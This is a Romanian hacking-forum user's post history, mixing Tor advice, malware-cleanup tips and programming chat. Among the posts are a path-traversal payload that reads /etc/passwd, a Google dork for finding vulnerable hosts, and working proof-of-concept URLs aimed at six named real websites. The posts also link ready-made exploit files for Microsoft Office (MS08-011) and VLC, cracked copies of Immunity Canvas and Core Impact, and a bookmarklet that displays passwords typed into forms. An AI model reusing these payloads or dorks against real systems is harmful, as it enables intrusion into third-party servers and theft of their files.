shinnok
Active Members-
Posts
250 -
Joined
-
Last visited
Everything posted by shinnok
-
O mica vulnerabilitate cu care m-am distrat in seara asta: - "index.php?body=" este partea vulnerabila. - "../../../../../../../../../../[director]" este ceea ce treb trimis lui body - "inurl:"index.php?body="" este google dorkul care va ajuta sa gasiti hosturi posibil vulnerabile - POC: http://www.exclusivestates.com/index.php?body=../../../../../../../../../../etc/passwd http://www.waterqualityplan.org/index.php?BODY=../../../../../../../../../../etc/passwd http://gp2.ro/ini/index.php?body=../../../../../../../../../../etc/passwd http://gp2.ro/ini/index.php?body=../../../../../../../../../../proc/cpuinfo http://www.renaissanceink.net/index.php?body=../../../../../../../../../../etc/passwd http://www.heritagecovenant.org/index.php?body=../../../../../../../../../../etc/passwd PS:nu stiu de cat timp circula vulnerabilitatea,daca cineva stie sa posteze
-
Am instalat de ceva timp torul( http://www.torproject.org/ ) atat pe windows(vista 32b) cat si pe linux(debian) si vreau sa vad spun ca este fantastic .Nu se compara cu nici un proxy out there sau orice altceva.Este mult mai rapid ca viteza,fara proxy checking bullshit(merge nu merge stiti voi),cat despre anonimitate nici nu cred ca mai e cazul sa va spun daca cititi pe site.Sa va spun in foarte putine cuvinte cam cum functioneaza:Treb sa instalati tor(el poate functiona atat ca client cat si ca relay(server)).In stadiul de client va creeaza un proxy socks local pe 9050 care va comunica cu un relay tor encriptat.Acel relay va face acelasi lucru la randul lui.Si tot asa.Intr-un final pachetele ajung la un relay final de unde sunt trimise la destinatie.Acelasi lucru se intampla si in sens invers.Acum ca sa puteti tunela orice aplicatie ce suporta socks prin tor e deajuns sa o redirectati catre localhost(127.0.0.1) 9050.Pentru http puteti folosi privoxy care la randul lui il redirectati catre tor.Sunt metode pentru a face sa mearga o sumedenie de aplicatii,mai ales pe linux,sa functioneze cu tor.(torify(pt aplicatii ce folos socket-uri) este magnific,deasemenea socat+altele).Eu pana acum am reusit sa fac orice aplicatie sami functioneze prin tor(in special pe linux). Acum intrebarea este: Intrati pe site,vedeti care e treaba,si daca vi se pare interesant incercati,daca nu reusiti sa il faceti sa mearga si asta se va intampla la cel putin 5-6 dintre voi sau aveti intrebari multiple atunci postati aici in sensul ca ati vreau un tutorial si atunci am sa fac un tutorial text in romana plus video.De ce vreau sa postati pentru ca nu as vrea sa pierd timpul daca nu sunteti ineresati sau sunt cativa dar sau descurcat si singuri.Deasemenea puteti pune intrebari aici direct.
-
Bine ai venit.Ai putea sa incepi cu C.Din punctul meu de vedere ar fi cea mai buna mutarea.Daca reusesti sa stapanesti C-ul si apoi C++ nu cred ca vei aveai problema in a stapani orice alt limbaj mai departe(in special limbaje imperative si orientate spre obiecte).
-
super tare log-ul ... totusi nu stiu cum a reusit macar sa se conecteze pe canal ?!? :roll: are sigur vreun batch ceva
-
IDA Pro initial dezvoltat de DataRescue si acum preluat de HexRays este considerat "the de facto standard" in reverse engineering,mai exact disassembling si debugging.Asta e parerea expertilor insa parerea mea personala este ca intradevar se poate numi "the de facto standard" in disassembling insa nu si in debugging(aici OllyDBG(+diverse plugin-uri) rulez.Este chiar magic cand vine vorba de disassembling.Inclus este si pluginul HexRays care sa va spun sincer m-a dat pe spate.Cu ajutorul lui puteti decompila cod binar intr-un pseudocod asemanator cu C.M-am jucat cu el si este intradevar uimitor sa te uiti cum iti decompileaza cod binar(masina) si iti genereaza acel pseudocod.Pana acum decompilarea a fost un vis pentru mine.Acum nu mai e.Makes life easier .In arhiva gasiti IDA versiunile pentru Linux,Windows,Mac + HexRays + SDK IDA.Sunt convins ca va fi util pentru multi dintre voi. Link rapidshare: http://rapidshare.com/files/101347715/DataRescue.IDA.Pro.Advanced.v5.2.Linux.Windows.MacOSX.YAG.UNiQUE.part1.rar.html http://rapidshare.com/files/101349038/DataRescue.IDA.Pro.Advanced.v5.2.Linux.Windows.MacOSX.YAG.UNiQUE.part2.rar.html Pentru mai multe informatii puteti vizita: Homepage-ul IDA:http://www.hex-rays.com/idapro/ Wikipedia:http://en.wikipedia.org/wiki/Interactive_Disassembler Screenshot:http://www.hex-rays.com/idapro/pix/idalarge.gif Plugin-ul HexRays:http://www.hex-rays.com/decompiler.shtml http://www.hex-rays.com/compare.shtml
-
No comment! Off-topic
-
Lol si cu ce vroiai sa inceapa cu BrainFuck:... http://en.wikipedia.org/wiki/Brainfuck
-
Si apropo tutorialul se intituleaza Bookmarklets nu Java sau Java script! Macar ban o zi ai merita. PS pentru admini:multe forumuri se duc de rapa din cauza unor posturi geniale ca ale acestui personaj si persoane ca el care se cred UberM3ist3rHack3r3lite si nimic nu este interesant pentru ei.
-
ce spui tu ma? ce nu ti se pare corect in thread ia zi? De zici ca nu am habar? Daca ai postat de foame...a doua data abtinete pentru ca nu te hraneste!
-
sau puteti incerca si astea: http://rapidshare.com/files/64261659/CE.v3.0.pm.part4.tar http://rapidshare.com/files/64261643/CE.v3.0.pm.part2.tar http://rapidshare.com/files/64261634/CE.v3.0.pm.part5.tar http://rapidshare.com/files/64261628/CE.v3.0.pm.part1.tar http://rapidshare.com/files/64261627/CE.v3.0.pm.part3.tar http://rapidshare.com/files/64261012/CE.v3.0.pm.part6.tar
-
uite am gasit torentu asta puteti sa-l luati sa vedeti daca e ce treb,o sa-l pun si eu la dwnload. http://thepiratebay.org/tor/3303761/CEH-Certified_Ethical_Hacker_Certification_Exam_312-50
-
Linkurile bune: Specialized Solutions - Certified Ethical Hacker - CEH http://rapidshare.com/files/11215826/Certified_Ethical_Hacker1.rar http://rapidshare.com/files/11215659/Certified_Ethical_Hacker2.rar http://rapidshare.com/files/11218476/Certified_Ethical_Hacker3.part1.rar http://rapidshare.com/files/11223165/Certified_Ethical_Hacker3.part2.rar http://rapidshare.com/files/11229001/Certified_Ethical_Hacker4.rar http://rapidshare.com/files/11213952/Certified_Ethical_Hacker5.rar http://rapidshare.com/files/11227061/Certified_Ethical_Hacker6.rar http://rapidshare.com/files/11232406/Certified_Ethical_Hacker7.rar http://rapidshare.com/files/11238975/Certified_Ethical_Hacker8.rar http://rapidshare.com/files/11238449/Certified_Ethical_Hacker9.rar aaa...pai da alea nu merg,nici eu nu leam avut,alea nu sunt asa de importante
-
ohh,sorry caut imediat alt link si va dau.Eu l-am vazut mai de mult.Acum am cautat pentru voi si greseala a fost ca am verificat doar prima parte
-
Bookmarklets-urile sunt bucati de cod java care permit anumite actiuni referitoare la pagina curenta incarcata in browser.Se numesc bookmarklets deoarece majoritatea salveaza respecitvul cod intr-un fisier html si il adauga ca bookmark in browserul folosit(sau adaugati in loc de linkul html pentru acel bookmark codul javascript) pentru access cu usurinta la respectivele scripturi.Deasemenea codul respectiv poate fi rulat dand copy-paste in address bar. Exemple de bookmarklets: search links - cauta toate linkurile in pagina curenta sau cele care contin un keyword: javascript:(function(){var x,n,nD,z,i; function htmlEscape(s){s=s.replace(/&/g,'&');s=s.replace(/>/g,'>');s=s.replace(/</g,'<');return s;} function attrQuoteEscape(s){s=s.replace(/&/g,'&'); s=s.replace(/"/g, '"');return s;} x=prompt("show links with this word/phrase in link text or target url (leave blank to list all links):", ""); n=0; if(x!=null) { x=x.toLowerCase(); nD = window.open().document; nD.writeln('<html><head><title>Links containing "'+htmlEscape(x)+'"</title><base target="_blank"></head><body>'); nD.writeln('Links on [url="'+attrQuoteEscape(location.href)+'"]'+htmlEscape(location.href)+'[/url] with link text or target url containing "' + htmlEscape(x) + '" <hr>'); z = document.links; for (i = 0; i < z.length; ++i) { if ((z[i].innerHTML && z[i].innerHTML.toLowerCase().indexOf(x) != -1) || z[i].href.toLowerCase().indexOf(x) != -1 ) { nD.writeln(++n + '. [url="' + attrQuoteEscape(z[i].href) + '"]' + (z[i].innerHTML || htmlEscape(z[i].href)) + '[/url] '); } } nD.writeln('<hr></body></html>'); nD.close(); } })(); How to:Dati copy paste la codul de mai sus in address bar chiar pe pagina in care suntei acum si vedeti cum functioneaza.Deasemenea il puteti adauga ca bookmark pentru access rapid la el.Acestea sunt valabile si pentru cele de mai jos. View passwords - arata parolele introduse in pagina curenta javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})(); How to: Intrati de ex. pe mail.yahoo.com si introduceti user si parola dar nu dati sign in.Apoi dati copy paste la cod si va arata parola introdusa. Rot13 selection - inlocuieste textul selectat cu forma echivalenta "encriptata" cu Rot13(roteste fiecare caracter 13 pozitii la dreapta in alfabet de ex.:H va deveni U): javascript:var coding = "abcdefghijklmnopqrstuvwxyzabcdefghijklmABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLM"; function rot13(t) { for (var r = "",i=0;i<t.length;i++) { character = t.charAt(i); position = coding.indexOf(character); if (position > -1) character = coding.charAt(position + 13); r += character; } return r; } S=window.getSelection(); function t(N) { return N.nodeType == N.TEXT_NODE; } function r(N) { if (t(N)) N.data = rot13(N.data); } for (j=0;j<S.rangeCount;++j) { var g=S.getRangeAt(j), e=g.startContainer, f=g.endContainer, E=g.startOffset, F=g.endOffset, m=(e==f); if(!m||!t(e)) { /* rot13 each text node between e and f, not including e and f. */ q=document.createTreeWalker(g.commonAncestorContainer, NodeFilter.SHOW_ELEMENT | NodeFilter.SHOW_TEXT, null, false); q.currentNode=e; for(N=q.nextNode(); N && N != f; N = q.nextNode()) r(N); } if (t(f)) f.splitText(F); if (!m) r(f); if (t(e)) { r(k=e.splitText(E)); if(m)f=k; e=k;} if (t(f)) g.setEnd(f,f.data.length); } void 0 How to:Selectati orice text de pe pagina curenta si dati copy paste la cod in address bar.Pentru convertire la forma originala selectati din nou si aplicati inca o data codul. Pentru mai multe informatii si exemple puteti intra pe siteul asta: https://www.squarefree.com/bookmarklets/ Acolo puteti gasi mai multe exemple.Puteti adauga ca bookmark orice bookmarklet de pe aceea pagina pentru access cu usurinta(adik fara copy-paste sau sa memorati codul si sa-l scrieti de fiecare data cand aveti nev de el lol). Cam asta este tot
-
Aveti mai jos un link catre training-ul video de la Specialized Solutions Certified Ethical Hacker.Sunt convins ca veti gasi ceva interesant in acest training.Mie personal mi sa parut interesant.Singurul dezavantaj este ca unele tooluri prezentate sunt obsolete de ceva vreme insa nu asta este important.Va recomand sa il luati si sa va uitati la el indiferent de experienta voastra in domeniul securitatii.Veti gasi cu siguranta ceva ce nu stiati sau stiati dar nu va puteati explica.Cu alte cuvinte merita sa-l vedeti.Merita mentionat faptul ca sunt in engleza,nici nu se putea altfel .Nu cred ca ar fi o problema,daca da atunci lasati threadul in pace...pentru ca la urma urmei internetul(domeniul informatic) se bazeaza 75% pe Eng. http://www.itexpert.org/showthread.php?t=8607 Acum aveti ce face weekend-ul asta
-
Intradevar s-ar putea sa fie un keylogger sau un radmin normal sau sub forma de trojan.Ai antivirus?Daca nu instaleaza.Iti recomand sa incerci si programul Spybot-S&D http://www.safer-networking.org/en/mirrors/index.html Ca alternativa poti sa incerci si http://www.lavasoftusa.com/products/ad_aware_free.php Daca te-a infectat cu un radmin cum ar fi vnc sau mai stiu eu care ala nu v-a fi detectat de antivir.Va treb sa investigezi personal. Acum sa inteleg ca doar a zis ca vede ce faci sau a dat si dovezi?
-
La fraza asta nu am ce zice.Ai perfecta dreptate.Miam adus aminte de Daniel Pearl si filmul din 2007 "A Mighty Heart" despre el.Cat de prosti pot fi unii oameni(ma refer la aia de l-au decapitat pe saracul om nevinovat in numele relgiei si nationalitatii si bla bla bla,apoi l-au mai si taiat in zece bucati).Asa cum se spune:"Fereste-te de omul prost cu ideea lui!" http://en.wikipedia.org/wiki/Daniel_Pearl http://www.imdb.com/title/tt0829459/ http://images.google.ro/images?hl=ro&q=daniel+pearl&btnG=C%C4%83utare+Imagini&gbv=2
-
Lol "find tiny..." Nici eu nu cred ca cineva ar putea fi interesat de micile tale cautari pe google.Atunci cand eu am deschis thread-ul de mai sus ma gandeam la cu totul altceva.Sunt oameni importanti,firme si companii mari,persoane cu profil ridicat,sunt noduri importante si ingrosate in reteaua asta numita internet pentru care chiar si aceasta mica monitorizare poate fi "fatala".E vorba de spionaj economic,social si industrial.Nu de grafurile tale care le-ai cautat semestrul trecut pentru AG.
-
Uitandu-ma astazi pe un forum tot romanesc am dat peste un post unde cineva zicea ca Google isi pastreaza o baza de date imensa ce contine toate activitatile inclusiv search-urile facute de milioane de oameni din lumea intreaga si ca nu ar treb sa folosim google direct de la ip-ul personal ci mai bine un proxy.Acum eu nu am nimic impotriva acesteri afirmatii si este chiar evidenta insa cateva persoane au raspuns ceva de genul:"Tu ce crezi ca e vreun chinezoi dinala mic care sta si cauta si sorteaza toate logurile alea ." Si atunci mam gandit sa le fac putina lumina postand urmatorul reply: it's not necessary that google will make the searches and sortings Ever heard of Echelon? http://en.wikipedia.org/wiki/ECHELON http://www.fas.org/irp/program/process/echelon.htm http://www.fas.org/irp/program/process/rapport_echelon_en.pdf http://echelonspoofer.com/ From here you can do your own digging. M-am gandit ca ar fi interesant sa vedeti si voi.Seya!
-
Ok pentru inceput asa vrea sa intri pe http://www.milw0rm.com/platforms/windows si sa derulezi pana dai de [ windows - local ] Desi majoritatea de acolo nu executa ceva malitios deoarece sunt POC-uri(Proof Of Concept) insa payload-ul(secventa de cod care determina ce actiune are loc dupa ce exploit-ul a avut loc cu success denumit in majoritatea cazurilor shellcode) poate fi schimbat sa faca destul de multe chestii urate. Ok acum o sa va prezint si doua exemple concrete pe care eu personal le-am testat si au functionat: 1:Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) http://www.milw0rm.com/exploits/5107 http://www.microsoft.com/technet/security/Bulletin/MS08-011.mspx Codul de pe milw0rm l-am testat pe Microsoft Windows XP Service Pack 2 && Microsoft Office 2003 acum cateva saptamani si a functionat.Codul compilat nu face decat sa creeze un fisier de tipul .wps(http://filext.com/file-extension/WPS) care apoi deschis cu office word ar trebui sa ruleze calc.exe.Codul este compilabil cu gcc(cygwin) si cu visual studio.Mai jos aveti un link catre un badboy.wps creat cu acest program ca sa va puteti convinge.Insa ar treb sa stiti ca nu functioneaza in toate cazurile,pot fi zeci de motive pentru care un anumit exploit in cazul asta cel de fata sa nu functioneze.Pentru cei care a functionat va rog postati ca sa vada si ceilalti. http://rapidshare.com/files/100843863/badboy.rar.html 2:VLC <=0.8.6.e Subtitle parsing local buffer overflow exploit http://www.milw0rm.com/exploits/5250 http://www.videolan.org/vlc/ Toate cele de mai sus sunt valabile si in cazul asta.Codul de pe milw0rm compilat si executat creeaza doua fisiere:unul cu extensia .avi si unul cu extensia.ssa. http://rapidshare.com/files/100845147/Bof-VLC.rar.html Linkul de pe rapidshare contine cele doua fisiere pe care le puteti folosi ca sa testati exploitul. Bof-VLC.avi Bof-VLC.ssa Tot ce treb sa faceti e sa deschideti .avi cu vlc si ar treb sa ruleze calc.exe. Acum nu pot sa sper decat ca cele de mai sus vor functiona pentru cei care vor sa le testeze.In cazul cel mai rau nu pot face decat sa omoare(crash) aplicatia cu care a fost deschisa(ceea ce e iarasi de-ajuns pentru un poc).Sunt multe alte exemple out-there care fac cam acelasi lucru:transforma niste fisiere aparent inofensibile(imagini,audio,video,subtitrari,documente).E deajuns sa va uitati pe milw0rm ca sa va faceti o idee.Happy testing!
-
http://iamsad.shinnok.evonet.ro/jokes/computer.html La adresa de mai sus puteti gasi multe glume legate de calculatoare.Majoritatea sunt de pe Tina's humor archive.Multe dintre ele sunt chiar consacrate si de multa vreme.Va asigur ca o sa gasiti destule sa va puna pe burta.Pacat ca sunt toate in engleza.Puteti chiar sa "browsati" site-ul insa nu prea am mai avut timp sa pun content nou pe el de cand l-am deschis ,nu am gasit persoane care sa ma ajute sa strang si sa adaug content.
-
Da asa cum s-a zis si mai sus daca incerci sa rulezi doua servere in acelasi timp avand configurile default vei primi acea eroare de bind() pentru ca al doilea v-a incerca si el sa asculte tot pe portul 21 care este cel default. Solutie : Schimba portul default pentru "listen_port" din fisierul "m-ftp_config" pentru unul din ele sau poti rula unul din ele cu switch-ul la linie de comanda "-p port". .. e urat zis maniac.Doar ca atunci cand vine vorba de *nix(in special linux) nu dau doi bani pe orice alt SO. Solutia pentru sugestia 1 o voi oferi in viitor.Nu am facut-o momentat pentru ca nu as vrea ca m-ftp sa fie dependent de alte biblioteci deoarece asta ar fi solutia cea mai usoara.In scurt timp o sa implementez si un algoritm de encriptare a parolelor si userilor pentru "m-ftp_accts". Sugestia a doua la fel ca si prima chiar este utila si iti multumesc pentru ea.Voi coda fixul cat mai curand.A few keys to be pressed
-
As dori sa adaug cateva programele pe care le puteti folosi pentru identificare si curatare manuala de virusi,trojane,...(...hmm o parte din ele): Process Explorer v11.11 - http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx (procexp de care aminteste si lokipaki mai sus) AutoRuns for Windows v9.13 - http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx Process Monitor v1.26 - http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx TCPView for Windows v2.53 http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx FileAlyzer - http://www.safer-networking.org/en/filealyzer/index.html RegAlyzer - http://www.safer-networking.org/en/regalyzer/index.html RunAlyzer - http://www.safer-networking.org/en/runalyzer/index.html PS:Toate de mai sus sunt freeware. Hmmm...as vrea totusi sa iti retragi putin cunvintele in legatura cu imaginile si mp3-urile virusate.Sunt destul de multe exploituri out-there care pur si simplu folosesc imagini ,fisiere audio,fisiere playlist,you name it,craftate intrun anumit mod,care exploateaza anumite buguri in anumite programe cu care le deschizi si genereaza sa zicem un buffer overflow in aplicatia mentionata.Iar atata timp cat acestea pot contine un payload anume poate fi executat de exemplu un virus daca vrei sa-l numesti asa sau worm sau trojan.Ca exemplu faimosul .ani pe windows si multe altele.Daca vrei mai multe exemple poti sa imi zici si o sa postez cate vrei. Kenpachi : merged two posts because they seemed usefull nu mai fa double post shinnok
-
Cele doua versiuni care circula de ceva timp .... in caz ca cineva nu le are.Daca nu stiti ce is va dau un indiciu: seamana cu metasploit http://rapidshare.com/files/100640494/Immunity.Canvas.v5.0.RETAIL-UNiQUE.rar.html http://rapidshare.com/files/100640763/coreimpactv4.rar.html Versiuni mai noi nici nu se pune in discutie e usor de inteles de ce nu se gasesc.
-
Acest post este dedicat "fanilor" Google. googlehacks program ce integreaza cateva din cautarile mai speciale intr-o interfata grafica creat de Jason Stallings : http://code.google.com/p/googlehacks/ google hacker cam vechi si asemanator cu googlehacks http://rapidshare.com/files/100634421/google_hacker-1.1.rar.html Si desigur taticul tuturor asa ziselor "hack-uri" de Google : http://johnny.ihackstuff.com/ghdb.php Daca sunteti interesati de astfel de trucuri google trebuie sa vizitati site-ul lui johnny.Asa cum spunea un individ:Nice guy!You should buy him a beer!(nu mai stiu pe ce site sau forum). Intre timp a mai aparut si un tool de la CDC(Cult of the dead cow,creatorii Back Orifice vechiului ) numit Goolag scanner,scanner de vulnerabilitati bazat pe google: http://cultdeadcow.com/archives/2008/02/goolag_scanner_relea.php3